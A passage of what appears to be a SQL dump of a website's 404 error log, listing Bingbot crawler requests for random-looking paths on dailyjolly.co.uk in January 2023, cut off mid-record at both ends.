bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37349,'2023-01-27 09:40:08','/aflaunt/aw626f0h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37350,'2023-01-27 09:40:09','/advice/upplig0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37351,'2023-01-27 09:40:15','/9i6593qg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37352,'2023-01-27 09:40:15','/awtj7r8e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37353,'2023-01-27 09:40:16','/9bgvge5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37354,'2023-01-27 09:40:16','/9bek916f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37355,'2023-01-27 09:40:17','/wp8crpjg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37356,'2023-01-27 09:40:17','/tipu7r9g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37357,'2023-01-27 09:40:18','/934n1cvf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37358,'2023-01-27 09:40:18','/tj3990vg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37359,'2023-01-27 09:40:19','/do1fbybe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37360,'2023-01-27 09:40:20','/dpigs48f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37361,'2023-01-27 09:40:20','/dte0smne2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37362,'2023-01-27 09:40:21','/1gqvzyag2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37363,'2023-01-27 09:40:21','/189oem2h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37364,'2023-01-27 09:40:22','/15af3y2e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37365,'2023-01-27 09:40:22','/incompetence/iw0c1zif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37366,'2023-01-27 09:40:23','/i4e8hqce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37367,'2023-01-27 09:40:24','/i4hi6kqf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37368,'2023-01-27 09:40:24','/i4sctr1g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37369,'2023-01-27 09:40:25','/imfyjiug2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37370,'2023-01-27 09:40:25','/ornithologist/t268ew2f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37371,'2023-01-27 09:40:26','/odinic/19zy0ckd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37372,'2023-01-27 09:40:27','/iwljow1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37373,'2023-01-27 09:40:27','/benzoate/tbpkca7f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37374,'2023-01-27 09:40:28','/benison/k6trcm8g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37375,'2023-01-27 09:40:28','/aworking/imba1c7h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37376,'2023-01-27 09:40:29','/bolye/a6a7nwjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37377,'2023-01-27 09:40:29','/neurotomy/kw49uk4h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37378,'2023-01-27 09:40:30','/wdp7b6de2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37379,'2023-01-27 09:40:30','/ferry/w9mj8spe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37380,'2023-01-27 09:40:31','/category/column0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37381,'2023-01-27 09:40:45','/metre/9iey6xie2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37382,'2023-01-27 09:40:45','/assq483f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37383,'2023-01-27 09:40:46','/kij6zvkg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37384,'2023-01-27 09:40:46','/aq8dvn6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37385,'2023-01-27 09:40:46','/advice/review17','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37386,'2023-01-27 09:40:47','/aighnt2f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37387,'2023-01-27 09:40:47','/daily-bw9yZGFjaW91c2x50.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37388,'2023-01-27 09:40:47','/aex25vse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37389,'2023-01-27 09:40:48','/discoverability/9f7covkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37390,'2023-01-27 09:40:48','/aehksuaf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37391,'2023-01-27 09:40:49','/detom9gg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37392,'2023-01-27 09:40:49','/wxseu2qg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37393,'2023-01-27 09:40:49','/matelasse/dhhvi0pg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37394,'2023-01-27 09:40:50','/lymphadenitis/19ly27jd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37395,'2023-01-27 09:40:50','/abide52/wbcrexjd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37396,'2023-01-27 09:40:51','/9oum4j7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37397,'2023-01-27 09:40:51','/9ortrgpf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37398,'2023-01-27 09:40:52','/tio1erse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37399,'2023-01-27 09:40:52','/kurepz4h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37400,'2023-01-27 09:40:52','/kinematics/9bgsf9ie2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37401,'2023-01-27 09:40:53','/9b8tfhzf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37402,'2023-01-27 09:40:53','/keys/aW5pcnjpdgf0axzl-42','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37403,'2023-01-27 09:40:54','/keys-scre.html?c=69sgni','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37404,'2023-01-27 09:40:54','/969vrbdf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37405,'2023-01-27 09:40:54','/wilsonia/a0l6ab0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37406,'2023-01-27 09:40:55','/1u6w5ckf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37407,'2023-01-27 09:40:55','/1qhv3eye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37408,'2023-01-27 09:40:56','/categories-zw50ZWxsdXM1.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37409,'2023-01-27 09:40:56','/widest/dp1gmeae2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37410,'2023-01-27 09:40:56','/warmer49/t6l19p0h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37411,'2023-01-27 09:40:57','/ds8jrgzg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37412,'2023-01-27 09:41:15','/d2ycy1ge2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37413,'2023-01-27 09:41:15','/ascpzdte2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37414,'2023-01-27 09:41:16','/tia8f49g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37415,'2023-01-27 09:41:16','/wpjq3kte2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37416,'2023-01-27 09:41:16','/d631skgg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37417,'2023-01-27 09:41:17','/kk23056f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37418,'2023-01-27 09:41:17','/wrd88e6f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37419,'2023-01-27 09:41:18','/d97w166e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37420,'2023-01-27 09:41:18','/wfwdodze2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37421,'2023-01-27 09:41:18','/ak77uqpg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37422,'2023-01-27 09:41:19','/wh5fgrjd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37423,'2023-01-27 09:41:19','/wx3kpn9f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37424,'2023-01-27 09:41:20','/aewoj80e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37425,'2023-01-27 09:41:20','/dexkphbf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37426,'2023-01-27 09:41:20','/sanctifier/wlncsk1g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37427,'2023-01-27 09:41:21','/9iruy03e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37428,'2023-01-27 09:41:21','/9bmbbdif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37429,'2023-01-27 09:41:22','/9bg8tu6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37430,'2023-01-27 09:41:22','/robes/keskwusf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37431,'2023-01-27 09:41:22','/96k54ybg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37432,'2023-01-27 09:41:23','/93iv58je2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37433,'2023-01-27 09:41:23','/ranking/cloddi19','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37434,'2023-01-27 09:41:24','/t7ob6lcg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37435,'2023-01-27 09:41:24','/1xupmk5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37436,'2023-01-27 09:41:24','/1qq6i7be2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37437,'2023-01-27 09:41:25','/1mzsemae2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37438,'2023-01-27 09:41:25','/dl0j9x8f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37439,'2023-01-27 09:41:26','/1hved4ce2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37440,'2023-01-27 09:41:26','/dsg8p8zf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37441,'2023-01-27 09:41:26','/18s4ji4h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37442,'2023-01-27 09:41:45','/1549p62h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37443,'2023-01-27 09:41:45','/ts3pxyjf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37444,'2023-01-27 